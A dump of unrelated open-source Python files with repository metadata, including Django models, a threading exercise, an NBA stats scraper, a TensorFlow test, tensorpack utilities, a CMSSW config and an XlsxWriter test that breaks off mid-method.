35b87aaf0cdcfdb706a1d081dce7b88de2b2f8a8 | 2ea4e667bdcd82565fca8ac96f74ee08bd67364e | /backend/chat/models.py | a2d82fbe6251955d52dea8721a5990fc822a0ba3 | [] | no_license | crowdbotics-apps/wadduplyapp-24147 | 39dff74efbdb15feaf1bde54dd9f6679b9c786ed | 19436f48d03dcc22807e9e331bb371a546f1dc9d | refs/heads/master | 2023-02-23T23:24:25.213934 | 2021-01-29T21:09:30 | 2021-01-29T21:09:30 | 334,259,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,152 | py | from django.conf import settings
from django.db import models
class ThreadAction(models.Model):
"Generated Model"
action = models.CharField(
max_length=7,
)
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="threadaction_thread",
)
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="threadaction_profile",
)
timestamp_action = models.DateTimeField(
auto_now_add=True,
)
class ForwardedMessage(models.Model):
"Generated Model"
message = models.ForeignKey(
"chat.Message",
on_delete=models.CASCADE,
related_name="forwardedmessage_message",
)
forwarded_by = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="forwardedmessage_forwarded_by",
)
forwarded_to = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="forwardedmessage_forwarded_to",
)
timestamp_forwarded = models.DateTimeField(
auto_now_add=True,
)
class MessageAction(models.Model):
"Generated Model"
action = models.CharField(
max_length=7,
)
message = models.ForeignKey(
"chat.Message",
on_delete=models.CASCADE,
related_name="messageaction_message",
)
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="messageaction_profile",
)
timestamp_action = models.DateTimeField(
auto_now_add=True,
)
class Message(models.Model):
"Generated Model"
message = models.TextField()
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="message_thread",
)
sent_by = models.ForeignKey(
"chat.ThreadMember",
on_delete=models.CASCADE,
related_name="message_sent_by",
)
attachment = models.URLField()
is_draft = models.BooleanField()
is_delivered = models.BooleanField()
is_read = models.BooleanField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
timestamp_delivered = models.DateTimeField()
timestamp_read = models.DateTimeField()
class Thread(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
thread_photo = models.URLField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
class ThreadMember(models.Model):
"Generated Model"
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="threadmember_profile",
)
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="threadmember_thread",
)
is_admin = models.BooleanField()
timestamp_joined = models.DateTimeField(
auto_now_add=True,
)
timestamp_left = models.DateTimeField()
last_rejoined = models.DateTimeField()
# Create your models here.
| [
"[email protected]"
] | |
c72650b3a9bf00b1efe3f5361b5d09a436c259cc | 48390374bb000e593a192ba5981210b130ebff1e | /using_threads/t3_locks.py | 3587dac6018618c0cf77b26f789f228f06185810 | [] | no_license | onionmccabbage/beyondAdvancedPythonApril2021 | 396615bb3c1989e0e57ae818950135250ce9ea33 | 0abccebcff1d0ff2e05f1f3b0188763fa3929920 | refs/heads/main | 2023-06-01T22:47:49.855370 | 2021-06-16T12:12:29 | 2021-06-16T12:12:29 | 360,176,678 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | import threading
import time
import random
counter = 1
lock = threading.Lock()
def workerA():
global counter
lock.acquire()
try:
while counter <100:
counter += 1
print( 'Worker A is incrementing counter to {}'.format(counter) )
except Exception as e:
print(e)
finally:
lock.release()
def workerB():
global counter
lock.acquire()
try:
while counter >-100:
counter -= 1
print( 'Worker B is decrementing counter to {}'.format(counter) )
except Exception as e:
print(e)
finally:
lock.release()
def main():
t0 = time.time()
thread1 = threading.Thread( target=workerA )
thread2 = threading.Thread( target=workerB )
thread1.start()
thread2.start()
thread1.join()
thread2.join()
t1 = time.time()
print('Execution took {} seconds'.format(t1-t0))
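# Note (added): because each worker holds the lock for its entire loop, the
# two threads run strictly one after the other; whichever thread acquires the
# lock first runs to its bound (+100 or -100) before the other one starts.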
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
2d7f069d13b7e23eb16fe01d25ac2cbd1a0d3e43 | 9714a7e31c922dea5187ef09de7c7095bda515e1 | /visualization/api/ShotsDash.py | 5c65ee274340933206fb8e4127309f18d9abfc70 | [] | no_license | rd11490/Russell | 5104c846bccc52b2456dadb0e3a85af22169006f | b1f2c4c96a04a492bc5d1a0596f9bbc40a696e9d | refs/heads/master | 2022-07-11T03:51:29.155850 | 2019-12-31T05:21:58 | 2019-12-31T05:21:58 | 104,696,236 | 5 | 1 | null | 2022-06-20T23:50:29 | 2017-09-25T02:50:00 | Scala | UTF-8 | Python | false | false | 1,585 | py | import json
import pandas as pd
import urllib3
players = [1628369, 1627759,202954,202681,1626179,202694,202330,1628464,1627824,203935,1628400,201143,203382]
def build_ulr(player):
return "https://stats.nba.com/stats/playerdashptshots?DateFrom=&DateTo=&GameSegment=&LastNGames=0&LeagueID=00&Location=&Month=0&OpponentTeamID=0&Outcome=&PerMode=Totals&Period=0&PlayerID={0}&Season=2018-19&SeasonSegment=&SeasonType=Regular+Season&TeamID=0&VsConference=&VsDivision=".format(player)
header_data = {
'Host': 'stats.nba.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36',
'Referer': 'stats.nba.com',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
http = urllib3.PoolManager()
def extract_data(url, player):
print(url)
r = http.request('GET', url, headers=header_data)
resp = json.loads(r.data)
results = resp['resultSets'][4]
headers = results['headers']
headers.append("player")
rows = results['rowSet']
frame = pd.DataFrame(rows)
frame["player"] = player
frame.columns = headers
return frame
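# Note (added): resultSets[4] is assumed here to be the closest-defender
# distance table; the index is position-dependent in the stats.nba.com
# response, and the assumption is consistent with the "CsDefenderDist.csv"
# output written below.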
frames = []
for player in players:
url = build_ulr(player)
data = extract_data(url, player)
frames.append(data)
out = pd.concat(frames)
out.to_csv("CsDefenderDist.csv")
| [
"[email protected]"
] | |
26c794fa0e7c4d0f5ce7dd1b14ec5667ae7562db | e38692437085a48abba0d682ec9921e7c24bf122 | /source/webapp/admin.py | db2c1391a590d746ca795f1daf03d514497964ea | [] | no_license | Aitmatow/farids_blog | f7a9e57c18957a1a08b66aff349904ad3b948cbc | cc92853ea8e2ac362df8bee4740d98280e7aefed | refs/heads/master | 2023-04-27T23:07:51.848466 | 2019-10-22T12:58:23 | 2019-10-22T12:58:23 | 215,323,364 | 0 | 0 | null | 2023-04-21T20:38:49 | 2019-10-15T14:44:35 | Python | UTF-8 | Python | false | false | 678 | py | from django.contrib import admin
from webapp.models import Article, Comment, Category, Tag
class CommentAdmin(admin.TabularInline):
model = Comment
fields = ['author', 'text']
extra = 0
class ArticleAdmin(admin.ModelAdmin):
list_display = ['pk', 'title', 'author', 'created_at']
list_filter = ['author', 'category']
list_display_links = ['pk', 'title']
search_fields = ['title', 'text']
exclude = []
filter_horizontal = ['tags']
readonly_fields = ['created_at', 'updated_at']
inlines = [CommentAdmin]
admin.site.register(Article, ArticleAdmin)
admin.site.register(Comment)
admin.site.register(Category)
admin.site.register(Tag)
| [
"[email protected]"
] | |
d2ff3964c849c9dfa4f125ea4f263ed8cc60c79e | 68e76ef27df38b0fe2c1c993a9c15896563f950d | /2 Практика Робот/robot-tasks-master/task_32.py | a6c5bd5d73d6bf5f60c3579c8d427f1c5c882714 | [] | no_license | Jumas-Cola/mipt_cs_on_python3_answers | 72e9341656daa4afa35f8d39de917eb5471ee132 | a2d128c4ce391bdeea6d20eb955855ad5bc5a0b4 | refs/heads/master | 2020-03-27T23:44:09.088994 | 2019-07-29T13:55:35 | 2019-07-29T13:55:35 | 147,341,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | #!/usr/bin/python3
from pyrob.api import *
@task(delay=0.01)
def task_8_18():
x=0
while not (wall_is_on_the_right() and not wall_is_on_the_left()):
if not wall_is_above() and wall_is_beneath():
while not wall_is_above():
move_up()
if cell_is_filled():
x+=1
else:
fill_cell()
while not wall_is_beneath():
move_down()
else:
fill_cell()
move_right()
mov('ax',x)
if __name__ == '__main__':
run_tasks()
| [
"[email protected]"
] | |
f57b234180126f5f12df6e7674e04017a4c1f047 | 7524bec2d88ca21750b09b83cc236cbfb6c61fea | /setup.py | be304e26ac19dc66f8ab4361a1a3074c10526e6b | [] | no_license | ericbusboom/insteon | c3d25f65038624b0bd3a26cf526f7b3c22891916 | f090231e197d517c24ee3b00a6143c2b1f0b89fc | refs/heads/master | 2020-04-19T08:23:51.283619 | 2015-02-14T19:55:10 | 2015-02-14T19:55:10 | 9,122,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 554 | py | from setuptools import setup, find_packages
setup(name='esbinsteon',
version='1.0',
description='Program to control an insteon interface. ',
author='Eric Busboom',
author_email='[email protected]',
url='http://busboom.org',
packages=['esbinsteon'],
package_data={'esbinsteon': ['config/*']},
scripts=['scripts/insteon_schedule','scripts/insteon_switch', 'scripts/insteon_install'],
install_requires=[
'pyephem',
'PyYAML',
'python-dateutil'
],
)
| [
"[email protected]"
] | |
7122016d14d9ea48aa260c13465ca27e234421c0 | b5a9d42f7ea5e26cd82b3be2b26c324d5da79ba1 | /tensorflow/python/training/training_util_test.py | 3ec83b7be7f95c031003a009aa40c63af02060b2 | [
"Apache-2.0"
] | permissive | uve/tensorflow | e48cb29f39ed24ee27e81afd1687960682e1fbef | e08079463bf43e5963acc41da1f57e95603f8080 | refs/heads/master | 2020-11-29T11:30:40.391232 | 2020-01-11T13:43:10 | 2020-01-11T13:43:10 | 230,088,347 | 0 | 0 | Apache-2.0 | 2019-12-25T10:49:15 | 2019-12-25T10:49:14 | null | UTF-8 | Python | false | false | 5,363 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for training_util."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import monitored_session
from tensorflow.python.training import training_util
@test_util.run_v1_only('b/120545219')
class GlobalStepTest(test.TestCase):
def _assert_global_step(self, global_step, expected_dtype=dtypes.int64):
self.assertEqual('%s:0' % ops.GraphKeys.GLOBAL_STEP, global_step.name)
self.assertEqual(expected_dtype, global_step.dtype.base_dtype)
self.assertEqual([], global_step.get_shape().as_list())
def test_invalid_dtype(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.Variable(
0.0,
trainable=False,
dtype=dtypes.float32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'does not have integer type',
training_util.get_global_step, g)
def test_invalid_shape(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
[0],
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step)
self.assertRaisesRegexp(TypeError, 'not scalar',
training_util.get_global_step, g)
def test_create_global_step(self):
self.assertIsNone(training_util.get_global_step())
with ops.Graph().as_default() as g:
global_step = training_util.create_global_step()
self._assert_global_step(global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step)
self.assertRaisesRegexp(ValueError, 'already exists',
training_util.create_global_step, g)
self._assert_global_step(training_util.create_global_step(ops.Graph()))
def test_get_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
variables.VariableV1(
0,
trainable=False,
dtype=dtypes.int32,
name=ops.GraphKeys.GLOBAL_STEP)
self._assert_global_step(
training_util.get_global_step(), expected_dtype=dtypes.int32)
self._assert_global_step(
training_util.get_global_step(g), expected_dtype=dtypes.int32)
def test_get_or_create_global_step(self):
with ops.Graph().as_default() as g:
self.assertIsNone(training_util.get_global_step())
self._assert_global_step(training_util.get_or_create_global_step())
self._assert_global_step(training_util.get_or_create_global_step(g))
@test_util.run_v1_only('b/120545219')
class GlobalStepReadTest(test.TestCase):
def test_global_step_read_is_none_if_there_is_no_global_step(self):
with ops.Graph().as_default():
self.assertIsNone(training_util._get_or_create_global_step_read())
training_util.create_global_step()
self.assertIsNotNone(training_util._get_or_create_global_step_read())
def test_reads_from_cache(self):
with ops.Graph().as_default():
training_util.create_global_step()
first = training_util._get_or_create_global_step_read()
second = training_util._get_or_create_global_step_read()
self.assertEqual(first, second)
def test_reads_before_increments(self):
with ops.Graph().as_default():
training_util.create_global_step()
read_tensor = training_util._get_or_create_global_step_read()
inc_op = training_util._increment_global_step(1)
inc_three_op = training_util._increment_global_step(3)
with monitored_session.MonitoredTrainingSession() as sess:
read_value, _ = sess.run([read_tensor, inc_op])
self.assertEqual(0, read_value)
read_value, _ = sess.run([read_tensor, inc_three_op])
self.assertEqual(1, read_value)
read_value = sess.run(read_tensor)
self.assertEqual(4, read_value)
if __name__ == '__main__':
test.main()
| [
"[email protected]"
] | |
3870e76c40ced6a801aa513970ff4feb772a2eac | c957b4663cc4cb21e5172f23c6989031be8c3e5b | /python/141. Linked List Cycle.py | 2b938337525872e17fcb52a8afbee163e4aa0323 | [] | no_license | gajanlee/leetcode | e061dc37af0f83bf2bce00c391c0b8a9f3177b22 | 0d3c8477f05604a059e58a8764ce0d8bd418edde | refs/heads/master | 2018-12-26T06:12:24.995542 | 2018-10-30T05:03:27 | 2018-10-30T05:03:27 | 102,965,574 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 718 | py | """
Given a linked list, determine if it has a cycle in it.
Follow up:
Can you solve it without using extra space?
"""
# If a cycle exists, one pointer advancing one step at a time and another
# advancing two steps at a time are guaranteed to meet inside the cycle.
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
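# Hedged usage sketch (added; ListNode is supplied by the LeetCode harness,
# and the two-node cycle below is only an illustration):
#     a, b = ListNode(1), ListNode(2)
#     a.next, b.next = b, a          # a -> b -> a -> b -> ...
#     Solution().hasCycle(a)         # -> True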
class Solution(object):
def hasCycle(self, head):
"""
:type head: ListNode
:rtype: bool
"""
if head is None: return False
l1, l2 = head, head.next
while l1 and l2 and l2.next:
if l1 == l2: return True
l1 = l1.next
l2 = l2.next.next
return False | [
"[email protected]"
] | |
8fe28884609f1cd95401053f75ed6003569df8ab | 2f14f8bccf15ccea2ff50e2f92164b43cb8f78b1 | /Dynamic Programming/LeetCode/MinimumCostForTickets_983.py | a2fbbbecdcf36d899c75b0abeb0b3e3cc2e3c0ba | [] | no_license | nikhiilll/Algorithms-using-Python | b3372f3ecca8e0c8e1358bb5a87391038a6630b6 | 8439864c637578d15915113564dbbf047b75b107 | refs/heads/master | 2023-02-10T23:09:31.312693 | 2020-12-24T16:56:29 | 2020-12-24T16:56:29 | 313,243,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 445 | py | def minimumCostForTickets(days, costs):
costArray = [0 for i in range(days[-1] + 1)]
for i in range(1, days[-1] + 1):
if i not in days:
costArray[i] = costArray[i - 1]
else:
costArray[i] = min(costArray[max(0, i - 1)] + costs[0], costArray[max(0, i - 7)] + costs[1], costArray[max(0, i - 30)] + costs[2])
return costArray[-1]
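# Added sanity checks against the two official LeetCode 983 examples
# (the sample call below should print 11):
assert minimumCostForTickets([1, 4, 6, 7, 8, 20], [2, 7, 15]) == 11
assert minimumCostForTickets([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 30, 31], [2, 7, 15]) == 17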
print(minimumCostForTickets([1,4,6,7,8,20], [2,7,15])) | [
"[email protected]"
] | |
0a8e33e5da3e1e73a09e33523e5636f64d2b3abd | 9697a1ab85af91ee587623ac3089adb5dbbd6814 | /configs/QCD_AOD__9_cfg.py | f0f4e8a89e9f22c748119952227009ee9236238a | [] | no_license | nicholas-bower/myLowPtGsfElectronAnalyzer | e9bfaad71631fda4fa67e532015daef2f03edab5 | d4558c124af04f09db9e51e468f8ac3268a940e5 | refs/heads/master | 2022-11-16T21:02:56.940840 | 2020-07-16T15:37:03 | 2020-07-16T15:37:03 | 280,191,555 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,818 | py |
# Auto generated configuration file
# using:
# Revision: 1.19
# Source: /local/reps/CMSSW/CMSSW/Configuration/Applications/python/ConfigBuilder.py,v
# with command line options: test2 -s RAW2DIGI,L1Reco,RECO --datatier RECO --era=Run2_2018 --conditions auto:phase1_2018_realistic --eventcontent RECO --filein file:test.root --no_exec
import FWCore.ParameterSet.Config as cms
#f = open("/uscms_data/d3/nbower/FSU/TestLowPt/CMSSW_10_6_12/src/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/macros/fileLists/m50_ALP_fileList.txt","r")
f = open('./myLowPtGsfElectronsAnalyzer/macros/fileLists/QCD_AOD/QCD_AOD__9.txt','r')
infiles = f.readlines()
f.close()
from FWCore.ParameterSet.VarParsing import VarParsing
options = VarParsing ('python')
options.setDefault('maxEvents',-1)
options.setDefault('inputFiles',infiles)
options.parseArguments()
process = cms.Process('TEST') # ,eras.bParkingOpen
# import of standard configurations
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(options.maxEvents)
)
# Input source
process.source = cms.Source("PoolSource",
fileNames = cms.untracked.vstring(options.inputFiles),
secondaryFileNames = cms.untracked.vstring()
)
process.options = cms.untracked.PSet(
)
# Output definition
# Path and EndPath definitions
process.load('myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer/myLowPtGsfElectronsAnalyzer_cfi')
# Schedule definition
process.TFileService = cms.Service("TFileService",
fileName = cms.string('root://cmseos.fnal.gov//store/user/nbower/plots/QCD_LowPT/QCD_AOD__9.root')
)
process.p = cms.Path(process.simple)
# Customisation from command line
# End adding early deletion
#open('pydump.py','w').write(process.dumpPython())
| [
"[email protected]"
] | |
2da59e2885e26454205131e62eb8ef38c89aa7d9 | 0b05df6c954e5952369d544a878111798c83be59 | /tensorpack/utils/argtools.py | 743bbaeb089d21c8a3f3e77d64f1937b75fdeb8d | [
"Apache-2.0"
] | permissive | SunskyF/tensorpack | ddd1182acc8cfe6354d08679ef6bae11022b4230 | ffe1398a146312cc74189e529475e67ca0b0cd5c | refs/heads/master | 2020-04-12T09:24:47.182655 | 2018-12-19T07:52:06 | 2018-12-19T07:52:06 | 162,401,727 | 0 | 0 | Apache-2.0 | 2018-12-19T07:49:38 | 2018-12-19T07:49:37 | null | UTF-8 | Python | false | false | 6,132 | py | # -*- coding: utf-8 -*-
# File: argtools.py
import inspect
import six
from . import logger
if six.PY2:
import functools32 as functools
else:
import functools
__all__ = ['map_arg', 'memoized', 'memoized_method', 'graph_memoized', 'shape2d', 'shape4d',
'memoized_ignoreargs', 'log_once', 'call_only_once']
def map_arg(**maps):
"""
Apply a mapping on certain argument before calling the original function.
Args:
maps (dict): {argument_name: map_func}
"""
def deco(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if six.PY2:
argmap = inspect.getcallargs(func, *args, **kwargs)
else:
# getcallargs was deprecated since 3.5
sig = inspect.signature(func)
argmap = sig.bind_partial(*args, **kwargs).arguments
for k, map_func in six.iteritems(maps):
if k in argmap:
argmap[k] = map_func(argmap[k])
return func(**argmap)
return wrapper
return deco
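# Hedged usage sketch (added; not part of the original module):
#
#     @map_arg(x=int)
#     def f(x):
#         return x + 1
#
#     f("41")  # -> 42; the string "41" is mapped through int() before the call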
memoized = functools.lru_cache(maxsize=None)
""" Alias to :func:`functools.lru_cache`
WARNING: memoization will keep keys and values alive!
"""
def graph_memoized(func):
"""
Like memoized, but keep one cache per default graph.
"""
# TODO it keeps the graph alive
import tensorflow as tf
GRAPH_ARG_NAME = '__IMPOSSIBLE_NAME_FOR_YOU__'
@memoized
def func_with_graph_arg(*args, **kwargs):
kwargs.pop(GRAPH_ARG_NAME)
return func(*args, **kwargs)
@functools.wraps(func)
def wrapper(*args, **kwargs):
assert GRAPH_ARG_NAME not in kwargs, "No Way!!"
graph = tf.get_default_graph()
kwargs[GRAPH_ARG_NAME] = graph
return func_with_graph_arg(*args, **kwargs)
return wrapper
_MEMOIZED_NOARGS = {}
def memoized_ignoreargs(func):
"""
A decorator. It performs memoization ignoring the arguments used to call
the function.
"""
def wrapper(*args, **kwargs):
if func not in _MEMOIZED_NOARGS:
res = func(*args, **kwargs)
_MEMOIZED_NOARGS[func] = res
return res
return _MEMOIZED_NOARGS[func]
return wrapper
def shape2d(a):
"""
Ensure a 2D shape.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 2. if ``a`` is a int, return ``[a, a]``.
"""
if type(a) == int:
return [a, a]
if isinstance(a, (list, tuple)):
assert len(a) == 2
return list(a)
raise RuntimeError("Illegal shape: {}".format(a))
def get_data_format(data_format, tfmode=True):
if tfmode:
dic = {'NCHW': 'channels_first', 'NHWC': 'channels_last'}
else:
dic = {'channels_first': 'NCHW', 'channels_last': 'NHWC'}
ret = dic.get(data_format, data_format)
if ret not in dic.values():
raise ValueError("Unknown data_format: {}".format(data_format))
return ret
def shape4d(a, data_format='channels_last'):
"""
    Ensure a 4D shape, to use with 4D symbolic functions.
Args:
a: a int or tuple/list of length 2
Returns:
list: of length 4. if ``a`` is a int, return ``[1, a, a, 1]``
or ``[1, 1, a, a]`` depending on data_format.
"""
s2d = shape2d(a)
if get_data_format(data_format) == 'channels_last':
return [1] + s2d + [1]
else:
return [1, 1] + s2d
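# Added example: shape4d(3) -> [1, 3, 3, 1] with data_format='channels_last'
# (the default), and [1, 1, 3, 3] with 'channels_first'.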
@memoized
def log_once(message, func='info'):
"""
Log certain message only once. Call this function more than one times with
the same message will result in no-op.
Args:
message(str): message to log
func(str): the name of the logger method. e.g. "info", "warn", "error".
"""
getattr(logger, func)(message)
def call_only_once(func):
"""
Decorate a method or property of a class, so that this method can only
be called once for every instance.
Calling it more than once will result in exception.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
# cannot use hasattr here, because hasattr tries to getattr, which
# fails if func is a property
assert func.__name__ in dir(self), "call_only_once can only be used on method or property!"
if not hasattr(self, '_CALL_ONLY_ONCE_CACHE'):
cache = self._CALL_ONLY_ONCE_CACHE = set()
else:
cache = self._CALL_ONLY_ONCE_CACHE
cls = type(self)
# cannot use ismethod(), because decorated method becomes a function
is_method = inspect.isfunction(getattr(cls, func.__name__))
assert func not in cache, \
"{} {}.{} can only be called once per object!".format(
'Method' if is_method else 'Property',
cls.__name__, func.__name__)
cache.add(func)
return func(*args, **kwargs)
return wrapper
def memoized_method(func):
"""
A decorator that performs memoization on methods. It stores the cache on the object instance itself.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
self = args[0]
assert func.__name__ in dir(self), "memoized_method can only be used on method!"
if not hasattr(self, '_MEMOIZED_CACHE'):
cache = self._MEMOIZED_CACHE = {}
else:
cache = self._MEMOIZED_CACHE
key = (func, ) + args[1:] + tuple(kwargs)
ret = cache.get(key, None)
if ret is not None:
return ret
value = func(*args, **kwargs)
cache[key] = value
return value
return wrapper
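# Hedged usage sketch (added):
#
#     class B(object):
#         @memoized_method
#         def compute(self, x):
#             return x * 2  # runs once per (method, args) key per instance
#
#     b = B()
#     b.compute(3)  # executes the body
#     b.compute(3)  # served from b._MEMOIZED_CACHE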
if __name__ == '__main__':
class A():
def __init__(self):
self._p = 0
@call_only_once
def f(self, x):
print(x)
@property
def p(self):
return self._p
@p.setter
@call_only_once
def p(self, val):
self._p = val
a = A()
a.f(1)
b = A()
b.f(2)
b.f(1)
print(b.p)
print(b.p)
b.p = 2
print(b.p)
b.p = 3
print(b.p)
| [
"[email protected]"
] | |
5b13733fd9888fea4a5dbbefc18f3413b70f4bec | 75e84467a370b22aae4f30ab1fa7b42ccec9cb85 | /cybox/objects/user_account_object.py | b25c7ea95eded4bb86a815050cbf12cda9073d4f | [
"BSD-3-Clause"
] | permissive | cy-fir/python-cybox | cbe6eaafeac2a0dcb2ba06925ea72c3c44e29f42 | 292a378be5322032e8df0b9a110c2205b72aeee6 | refs/heads/master | 2020-12-31T03:36:26.544132 | 2016-01-22T22:05:25 | 2016-01-22T22:05:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,075 | py | # Copyright (c) 2015, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
from mixbox import entities
from mixbox import fields
import cybox.bindings.user_account_object as user_account_binding
from cybox.common import DateTime, Duration, String
from cybox.objects.account_object import Account
class Group(entities.Entity):
"""An abstract class for account groups."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class GroupList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.GroupListType
_binding_var = 'Group'
_contained_type = Group
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class Privilege(entities.Entity):
"""An abstract class for account privileges."""
def __init__(self):
raise TypeError("Cannot instantiate abstract type.")
class PrivilegeList(entities.EntityList):
_binding = user_account_binding
_binding_class = user_account_binding.PrivilegeListType
_binding_var = 'Privilege'
_contained_type = Privilege
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
class UserAccount(Account):
_binding = user_account_binding
_binding_class = user_account_binding.UserAccountObjectType
_namespace = 'http://cybox.mitre.org/objects#UserAccountObject-2'
_XSI_NS = "UserAccountObj"
_XSI_TYPE = "UserAccountObjectType"
password_required = fields.TypedField('password_required')
full_name = fields.TypedField('Full_Name', String)
home_directory = fields.TypedField('Home_Directory', String)
last_login = fields.TypedField('Last_Login', DateTime)
script_path = fields.TypedField('Script_Path', String)
username = fields.TypedField('Username', String)
user_password_age = fields.TypedField('User_Password_Age', Duration)
# These should be overriden by subclasses
group_list = fields.TypedField('Group_List', GroupList)
privilege_list = fields.TypedField('Privilege_List', PrivilegeList)
| [
"[email protected]"
] | |
925fde5c4d36383db5a4ca3dd2f2a95b0eac5cd1 | 45de7d905486934629730945619f49281ad19359 | /xlsxwriter/test/worksheet/test_write_sheet_view.py | 80b851daa21e858de10d231daeeebed0d8042104 | [
"BSD-2-Clause"
] | permissive | jmcnamara/XlsxWriter | 599e1d225d698120ef931a776a9d93a6f60186ed | ab13807a1be68652ffc512ae6f5791d113b94ee1 | refs/heads/main | 2023-09-04T04:21:04.559742 | 2023-08-31T19:30:52 | 2023-08-31T19:30:52 | 7,433,211 | 3,251 | 712 | BSD-2-Clause | 2023-08-28T18:52:14 | 2013-01-04T01:07:06 | Python | UTF-8 | Python | false | false | 3,163 | py | ###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2023, John McNamara, [email protected]
#
import unittest
from io import StringIO
from ...worksheet import Worksheet
class TestWriteSheetView(unittest.TestCase):
"""
Test the Worksheet _write_sheet_view() method.
"""
def setUp(self):
self.fh = StringIO()
self.worksheet = Worksheet()
self.worksheet._set_filehandle(self.fh)
def test_write_sheet_view_tab_not_selected(self):
"""Test the _write_sheet_view() method. Tab not selected"""
self.worksheet._write_sheet_view()
exp = """<sheetView workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_tab_selected(self):
"""Test the _write_sheet_view() method. Tab selected"""
self.worksheet.select()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines()"""
self.worksheet.select()
self.worksheet.hide_gridlines()
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_0(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(0)"""
self.worksheet.select()
self.worksheet.hide_gridlines(0)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_1(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(1)"""
self.worksheet.select()
self.worksheet.hide_gridlines(1)
self.worksheet._write_sheet_view()
exp = """<sheetView tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_gridlines_2(self):
"""Test the _write_sheet_view() method. Tab selected + hide_gridlines(2)"""
self.worksheet.select()
self.worksheet.hide_gridlines(2)
self.worksheet._write_sheet_view()
exp = """<sheetView showGridLines="0" tabSelected="1" workbookViewId="0"/>"""
got = self.fh.getvalue()
self.assertEqual(got, exp)
def test_write_sheet_view_hide_row_col_headers(self):
"""Test the _write_sheet_views() method"""
self.worksheet.select()
self.worksheet.hide_row_col_headers()
